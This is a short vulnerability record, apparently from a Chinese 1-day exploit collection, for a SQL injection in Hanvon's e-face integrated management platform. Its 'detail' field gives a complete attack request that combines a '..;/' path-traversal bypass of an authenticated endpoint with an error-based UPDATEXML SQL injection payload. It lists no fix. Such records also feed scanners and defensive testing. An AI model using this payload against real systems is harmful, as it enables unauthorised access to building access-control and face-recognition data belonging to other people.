vendor = "汉王"
name = "汉王e脸通综合管理平台 queryDoorInfoList.do SQL注入"
type = "SQL注入"
version = "未知"
path = "/manage/dgmCommand/finishRegister.do/"
detail = "/manage/dgmCommand/finishRegister.do/..;/..;/doorInfo/queryDoorInfoList.du?page=1&pageSize=10&order=(UPDATEXML(2920,CONCAT(0x2e,0x71716a7071,(SELECT+(ELT(2920=2920,1))),0x71706b7671),8357))"
fix = "未知"
date = "0729"
label = "1day"
verifier = "AdySec"
